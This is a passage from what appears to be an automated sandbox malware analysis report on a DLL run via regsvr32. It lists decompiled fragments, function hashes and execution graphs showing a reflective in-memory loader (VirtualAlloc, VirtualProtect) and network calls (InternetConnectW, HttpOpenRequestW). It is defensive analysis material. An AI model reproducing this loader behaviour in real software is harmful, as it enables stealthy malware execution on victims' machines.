				if ( *_t82 == _t83) goto 0x8003a6e5;
				if ( *((intOrPtr*)(_t82 + 8)) != _t83) goto 0x8003a6d9;
				 *0x80071ec0 = 0;
				_a16 = _t83;
				 *0x80071ed0 = _t82;
				E0000000118003F8F4(_t82 + 8, _t83 + 1);
				_a16 = _t83;
				E0000000118003F8F4(_t82 + 8, _t67);
				return _t47;
			}
















                                                                                                              0x18003a5a8
                                                                                                              0x18003a5bd
                                                                                                              0x18003a5c2
                                                                                                              0x18003a5c6
                                                                                                              0x18003a5d1
                                                                                                              0x18003a5d3
                                                                                                              0x18003a5dd
                                                                                                              0x18003a5df
                                                                                                              0x18003a5e6
                                                                                                              0x18003a5f2
                                                                                                              0x18003a5fd
                                                                                                              0x18003a603
                                                                                                              0x18003a60a
                                                                                                              0x18003a614
                                                                                                              0x18003a619
                                                                                                              0x18003a61e
                                                                                                              0x18003a622
                                                                                                              0x18003a62a
                                                                                                              0x18003a62f
                                                                                                              0x18003a632
                                                                                                              0x18003a63b
                                                                                                              0x18003a644
                                                                                                              0x18003a651
                                                                                                              0x18003a656
                                                                                                              0x18003a65c
                                                                                                              0x18003a65e
                                                                                                              0x18003a663
                                                                                                              0x18003a663
                                                                                                              0x18003a666
                                                                                                              0x18003a668
                                                                                                              0x18003a67c
                                                                                                              0x18003a681
                                                                                                              0x18003a68a
                                                                                                              0x18003a691
                                                                                                              0x18003a698
                                                                                                              0x18003a6a0
                                                                                                              0x18003a6a7
                                                                                                              0x18003a6ad
                                                                                                              0x18003a6b4
                                                                                                              0x18003a6bd
                                                                                                              0x18003a6c3
                                                                                                              0x18003a6c8
                                                                                                              0x18003a6ca
                                                                                                              0x18003a6d7
                                                                                                              0x18003a6e3
                                                                                                              0x18003a6e5
                                                                                                              0x18003a6ed
                                                                                                              0x18003a6f1
                                                                                                              0x18003a6f8
                                                                                                              0x18003a702
                                                                                                              0x18003a706
                                                                                                              0x18003a71d

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: *&
                                                                                                              • API String ID: 3215553584-3918557214
                                                                                                              • Opcode ID: 102d3ac2ce971ce39d549cadd1bd562f061b267b120d46d4324c6b9a730a988d
                                                                                                              • Instruction ID: 3fb5655d6e3dac2ff821eaed6ad99ba60b851d178ae5e3599b71aff8b38906cc
                                                                                                              • Opcode Fuzzy Hash: 102d3ac2ce971ce39d549cadd1bd562f061b267b120d46d4324c6b9a730a988d
                                                                                                              • Instruction Fuzzy Hash: 7C418F36208B488AFB97DF25EC413EA27A5F7497C4F168026FE4A47795DF3AC6498300
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180054124 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                              • String ID: U
                                                                                                              • API String ID: 442123175-4171548499
                                                                                                              • Opcode ID: fb7c165935c9dd8b3c92eb146031f2715b2fbd1017427d285a0162f3cc3bec4d
                                                                                                              • Instruction ID: 19c79a3e4bd28c1c2bc389499ae744ac110ee38b1bb586edf8dc59ac8a4207f7
                                                                                                              • Opcode Fuzzy Hash: fb7c165935c9dd8b3c92eb146031f2715b2fbd1017427d285a0162f3cc3bec4d
                                                                                                              • Instruction Fuzzy Hash: 4841B133214A4881EBA18F25E8443EA67A1F39C7D8F818121FE4D9B798DF3DC645C740
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180008CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+
                                                                                                              • String ID: void$void
                                                                                                              • API String ID: 2943138195-3746155364
                                                                                                              • Opcode ID: 5edf4dccb0b3cef4fbce06ad1660bb12fdc0603393f8f3617ef10eb879b59424
                                                                                                              • Instruction ID: cbddf8a76573ec69fca6ab013c564c6c6d17e4b490edf8c3fdd2f3fdbce3a3df
                                                                                                              • Opcode Fuzzy Hash: 5edf4dccb0b3cef4fbce06ad1660bb12fdc0603393f8f3617ef10eb879b59424
                                                                                                              • Instruction Fuzzy Hash: A2315072A10B5898FB52CB64D8413EC37B0F75C788F448226EE8A63B99DF388248C754
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018005A910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 35%
                                                                                                              			E0000000118005A910(void* __ecx, void* __edx, long long __rbx, long long _a8, intOrPtr _a48) {
				signed long long _v48;
				void* _t6;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				void* _t25;

				_a8 = __rbx;
				asm("movsd [esp+0x20], xmm3");
				asm("movsd [esp+0x18], xmm2");
				_t9 = __ecx;
				r8d = 0;
				if ( *0x800684c0 == __edx) goto 0x8005a979;
				r8d = r8d + 1;
				if (0x1800684d0 - 0x80068690 < 0) goto 0x8005a938;
				_v48 = _v48 & 0x00000000;
				E0000000118005AA00(_t6, __ecx, _t14, __rbx, _a48, _t24, _t25);
				_t8 = E0000000118005A8E0(_t9, 0x1800684d0, _a48);
				asm("movsd xmm0, [ebp+0x30]");
				return _t8;
			}










                                                                                                              0x18005a910
                                                                                                              0x18005a915
                                                                                                              0x18005a91b
                                                                                                              0x18005a930
                                                                                                              0x18005a935
                                                                                                              0x18005a93a
                                                                                                              0x18005a93c
                                                                                                              0x18005a94d
                                                                                                              0x18005a94f
                                                                                                              0x18005a95d
                                                                                                              0x18005a964
                                                                                                              0x18005a969
                                                                                                              0x18005a978

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _set_errno_from_matherr
                                                                                                              • String ID: exp
                                                                                                              • API String ID: 1187470696-113136155
                                                                                                              • Opcode ID: a55d063e2d92643c77edbb9228630d4be8359cd6396576c891c56c76603a433e
                                                                                                              • Instruction ID: 8fab5db25f0ddbf56ef9092f6d800935e5b73aa4ded74bd4d259fb6676ba0600
                                                                                                              • Opcode Fuzzy Hash: a55d063e2d92643c77edbb9228630d4be8359cd6396576c891c56c76603a433e
                                                                                                              • Instruction Fuzzy Hash: 9621E636A156588AE791DF74C4407ED37B0FB4D388F109525FA0DA6B4ADE38C6458B40
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180004B58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlPcToFileHeader.KERNEL32(0000000180002EF7,?,?,?,?,000000018000284B), ref: 0000000180004B9C
                                                                                                              • RaiseException.KERNEL32(?,?,?,?,000000018000284B), ref: 0000000180004BE2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                              • Opcode ID: b3230ac8454462189cad12ee79b7150df8f48308631d0ac3bb24d637d3d4be21
                                                                                                              • Instruction ID: c34b9f234e98857a778ed06eb65aaf5042c10baf4dbd7298f668a46951147372
                                                                                                              • Opcode Fuzzy Hash: b3230ac8454462189cad12ee79b7150df8f48308631d0ac3bb24d637d3d4be21
                                                                                                              • Instruction Fuzzy Hash: CB110D72218B4882EB658B15E44039977E5F788B94F188221EF8D07B54DF39CA55C744
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:18.5%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:7%
                                                                                                              Total number of Nodes:57
                                                                                                              Total number of Limit Nodes:10
                                                                                                              execution_graph 3564 21418e0 3567 214a804 3564->3567 3566 21419fe 3570 214a848 3567->3570 3568 214ab06 Process32NextW 3568->3570 3569 214ab3a 3569->3566 3570->3568 3570->3569 3571 3b0000 3572 3b0183 3571->3572 3573 3b043e VirtualAlloc 3572->3573 3576 3b0462 3573->3576 3574 3b0531 GetNativeSystemInfo 3575 3b056d VirtualAlloc 3574->3575 3578 3b0a00 3574->3578 3577 3b058b VirtualAlloc 3575->3577 3580 3b05a0 3575->3580 3576->3574 3576->3578 3577->3580 3579 3b09d9 VirtualProtect 3579->3580 3580->3578 3580->3579 3580->3580 3581 21393ac 3587 21393f7 3581->3587 3582 213ae75 3587->3582 3589 21584dc 3587->3589 3593 2136698 3587->3593 3597 2143e18 3587->3597 3601 214762c 3587->3601 3605 21493e0 3587->3605 3592 2158505 3589->3592 3591 215863c 3591->3587 3592->3591 3609 214a408 3592->3609 3596 21366ea 3593->3596 3594 21372b5 3594->3587 3596->3594 3620 2137cac 3596->3620 3599 2143e55 3597->3599 3600 2143f91 3599->3600 3631 21418e0 3599->3631 3600->3587 3603 2147656 3601->3603 3602 2147848 3602->3587 3603->3602 3604 21418e0 Process32NextW 3603->3604 3604->3603 3608 2149433 3605->3608 3606 214970e 3606->3587 3607 21418e0 Process32NextW 3607->3608 3608->3606 3608->3607 3611 214a432 3609->3611 3612 214a712 3611->3612 3613 21576a4 3611->3613 3612->3592 3614 215778a 3613->3614 3615 215795e 3614->3615 3617 2134a8c 3614->3617 3615->3611 3619 2134afa 3617->3619 3618 2134c26 GetVolumeInformationW 3618->3615 3619->3618 3623 2137d34 3620->3623 3621 2138c24 3621->3596 3623->3621 3625 2145a84 3623->3625 3628 2144368 3623->3628 3627 2145b00 3625->3627 3626 2145c1a HttpOpenRequestW 3626->3623 3627->3626 3630 2144411 3628->3630 3629 2144558 InternetConnectW 3629->3623 3630->3629 3632 214a804 Process32NextW 3631->3632 3633 21419fe 3632->3633 3633->3599

                                                                                                              Executed Functions

                                                                                                              Function 003B0000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 3b0000-3b0460 call 3b0aa8 * 2 VirtualAlloc 22 3b048a-3b0494 0->22 23 3b0462-3b0466 0->23 26 3b049a-3b049e 22->26 27 3b0a91-3b0aa6 22->27 24 3b0468-3b0488 23->24 24->22 24->24 26->27 28 3b04a4-3b04a8 26->28 28->27 29 3b04ae-3b04b2 28->29 29->27 30 3b04b8-3b04bf 29->30 30->27 31 3b04c5-3b04d2 30->31 31->27 32 3b04d8-3b04e1 31->32 32->27 33 3b04e7-3b04f4 32->33 33->27 34 3b04fa-3b0507 33->34 35 3b0509-3b0511 34->35 36 3b0531-3b0567 GetNativeSystemInfo 34->36 37 3b0513-3b0518 35->37 36->27 38 3b056d-3b0589 VirtualAlloc 36->38 39 3b051a-3b051f 37->39 40 3b0521 37->40 41 3b058b-3b059e VirtualAlloc 38->41 42 3b05a0-3b05ac 38->42 43 3b0523-3b052f 39->43 40->43 41->42 44 3b05af-3b05b2 42->44 43->36 43->37 45 3b05c1-3b05db 44->45 46 3b05b4-3b05bf 44->46 47 3b061b-3b0622 45->47 48 3b05dd-3b05e2 45->48 46->44 49 3b06db-3b06e2 47->49 50 3b0628-3b062f 47->50 51 3b05e4-3b05ea 48->51 55 3b06e8-3b06f9 49->55 56 3b0864-3b086b 49->56 50->49 54 3b0635-3b0642 50->54 52 3b060b-3b0619 51->52 53 3b05ec-3b0609 51->53 52->47 52->51 53->52 53->53 54->49 59 3b0648-3b064f 54->59 60 3b0702-3b0705 55->60 57 3b0871-3b087f 56->57 58 3b0917-3b0929 56->58 63 3b090e-3b0911 57->63 61 3b092f-3b0937 58->61 62 3b0a07-3b0a1a 58->62 64 3b0654-3b0658 59->64 65 3b06fb-3b06ff 60->65 66 3b0707-3b070a 60->66 68 3b093b-3b093f 61->68 87 3b0a1c-3b0a27 62->87 88 3b0a40-3b0a4a 62->88 63->58 67 3b0884-3b08a9 63->67 69 3b06c0-3b06ca 64->69 65->60 70 3b0788-3b078e 66->70 71 3b070c-3b071d 66->71 94 3b08ab-3b08b1 67->94 95 3b0907-3b090c 67->95 74 3b09ec-3b09fa 68->74 75 3b0945-3b095a 68->75 72 3b065a-3b0669 69->72 73 3b06cc-3b06d2 69->73 77 3b0794-3b07a2 70->77 76 3b071f-3b0720 71->76 71->77 83 3b066b-3b0678 72->83 84 3b067a-3b067e 72->84 73->64 79 3b06d4-3b06d5 73->79 74->68 85 3b0a00-3b0a01 74->85 81 3b097b-3b097d 75->81 82 3b095c-3b095e 75->82 86 3b0722-3b0784 76->86 89 3b07a8 77->89 90 3b085d-3b085e 77->90 79->49 99 3b097f-3b0981 81->99 100 3b09a2-3b09a4 81->100 96 3b096e-3b0979 82->96 97 3b0960-3b096c 82->97 98 3b06bd-3b06be 83->98 101 3b068c-3b0690 84->101 102 3b0680-3b068a 84->102 85->62 86->86 103 3b0786 86->103 104 3b0a38-3b0a3e 87->104 92 3b0a7b-3b0a8e 88->92 93 3b0a4c-3b0a54 88->93 91 3b07ae-3b07d4 89->91 90->56 125 3b07d6-3b07d9 91->125 126 3b0835-3b0839 91->126 92->27 93->92 106 3b0a56-3b0a78 93->106 115 3b08bb-3b08c8 94->115 116 3b08b3-3b08b9 94->116 95->63 107 3b09be-3b09bf 96->107 97->107 98->69 108 3b0989-3b098b 99->108 109 3b0983-3b0987 99->109 113 3b09ac-3b09bb 100->113 114 3b09a6-3b09aa 100->114 111 3b0692-3b06a3 101->111 112 3b06a5-3b06a9 101->112 110 3b06b6-3b06ba 102->110 103->77 104->88 105 3b0a29-3b0a35 104->105 105->104 106->92 121 3b09c5-3b09cb 107->121 108->100 119 3b098d-3b098f 108->119 109->107 110->98 111->110 112->98 120 3b06ab-3b06b3 112->120 113->107 114->107 123 3b08ca-3b08d1 115->123 124 3b08d3-3b08e5 115->124 122 3b08ea-3b08fe 116->122 127 3b0999-3b09a0 119->127 128 3b0991-3b0997 119->128 120->110 129 3b09d9-3b09e9 VirtualProtect 121->129 130 3b09cd-3b09d3 121->130 122->95 141 3b0900-3b0905 122->141 123->123 123->124 124->122 132 3b07db-3b07e1 125->132 133 3b07e3-3b07f0 125->133 134 3b083b 126->134 135 3b0844-3b0850 126->135 127->121 128->107 129->74 130->129 137 3b0812-3b082c 132->137 138 3b07fb-3b080d 133->138 139 3b07f2-3b07f9 133->139 134->135 135->91 140 3b0856-3b0857 135->140 137->126 143 3b082e-3b0833 137->143 138->137 139->138 139->139 140->90 141->94 143->125
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1764408342.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3b0000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                                                              • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                              • API String ID: 2313188843-2517549848
                                                                                                              • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                              • Instruction ID: 9afc1e300d741774a680026ef55b814baa8c9bc1b53663ca5f48fe88e5bb128d
                                                                                                              • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                              • Instruction Fuzzy Hash: 6A72C430618B488BDB2DDF18C8856FAB7E1FB98305F10462EE9CAD7611DB34D946CB85
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 02144368 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 600 2144368-2144447 call 2131000 603 214444d-2144552 call 215412c 600->603 604 2144558-2144592 InternetConnectW 600->604 603->604
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, Offset: 02131000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2131000_regsvr32.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ConnectInternet
                                                                                                              • String ID: #X
                                                                                                              • API String ID: 3050416762-1684620495
                                                                                                              • Opcode ID: 5ce426e489b13cb5dd9426aa8df30c6c42626cb023b28a6060ff33400ea5f906
                                                                                                              • Instruction ID: 9597aa68f257ec9a78ddde731ec39a878de90127120fa09761cdb6d7135f82fe
                                                                                                              • Opcode Fuzzy Hash: 5ce426e489b13cb5dd9426aa8df30c6c42626cb023b28a6060ff33400ea5f906
                                                                                                              • Instruction Fuzzy Hash: 6251B2B05087848BD3B8DF18D48579ABBE1FBC8354F508A1EE48DD7250DBB49888CB46
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0214A804 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, Offset: 02131000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2131000_regsvr32.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: lr
                                                                                                              • API String ID: 0-916072004
                                                                                                              • Opcode ID: fa212b8693eb9b32a65a2385a5ea898d40d4b6b25daee9b6546e8f2daae18533
                                                                                                              • Instruction ID: 397a855b6a89f601a47c7eaca67e7fd4d451b2caa11f7cfcf7401552229c866f
                                                                                                              • Opcode Fuzzy Hash: fa212b8693eb9b32a65a2385a5ea898d40d4b6b25daee9b6546e8f2daae18533
                                                                                                              • Instruction Fuzzy Hash: 88917F705997849FE7E8CF24C8D999A7BE0FB84704F501A1DF88A8B2A0DB74D945CB42
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 02145A84 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 214 2145a84-2145b20 call 2131000 217 2145b26-2145c14 call 215412c 214->217 218 2145c1a-2145c4d HttpOpenRequestW 214->218 217->218
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, Offset: 02131000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2131000_regsvr32.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: HttpOpenRequest
                                                                                                              • String ID: )$6s$S}
                                                                                                              • API String ID: 1984915467-2961771619
                                                                                                              • Opcode ID: 49993eb3b17d39333e9e1259aed1d743b9c1b554fa7d30d8ee1f3a6d5df41434
                                                                                                              • Instruction ID: 3acf75e259cd52eec897aa0013668cfda9f1874bdc03d45520fce837fb283081
                                                                                                              • Opcode Fuzzy Hash: 49993eb3b17d39333e9e1259aed1d743b9c1b554fa7d30d8ee1f3a6d5df41434
                                                                                                              • Instruction Fuzzy Hash: 0E41F7706087848FD7B4DF29D489B9BBBE0FB85315F208A1EE48DC7251DB789588CB46
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 02134A8C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 607 2134a8c-2134b1b call 2131000 610 2134b21-2134c20 call 215412c 607->610 611 2134c26-2134c61 GetVolumeInformationW 607->611 610->611
                                                                                                              APIs
                                                                                                              • GetVolumeInformationW.KERNEL32 ref: 02134C47
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, Offset: 02131000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2131000_regsvr32.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InformationVolume
                                                                                                              • String ID: x`w
                                                                                                              • API String ID: 2039140958-3659642790
                                                                                                              • Opcode ID: b29f32be5ab8f120aeceb8c0cfe0e40151f68ac74143fd1404a76dc8bc8974b3
                                                                                                              • Instruction ID: 32bd1bdda27a19098223e77ccfae0f1a398c19a05759e78b5d85e90b8307713a
                                                                                                              • Opcode Fuzzy Hash: b29f32be5ab8f120aeceb8c0cfe0e40151f68ac74143fd1404a76dc8bc8974b3
                                                                                                              • Instruction Fuzzy Hash: 4B413A7050C7808FE7B8DF18D489B9AB7E0FB98315F104A5DD48DD7295DB788844CB46
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%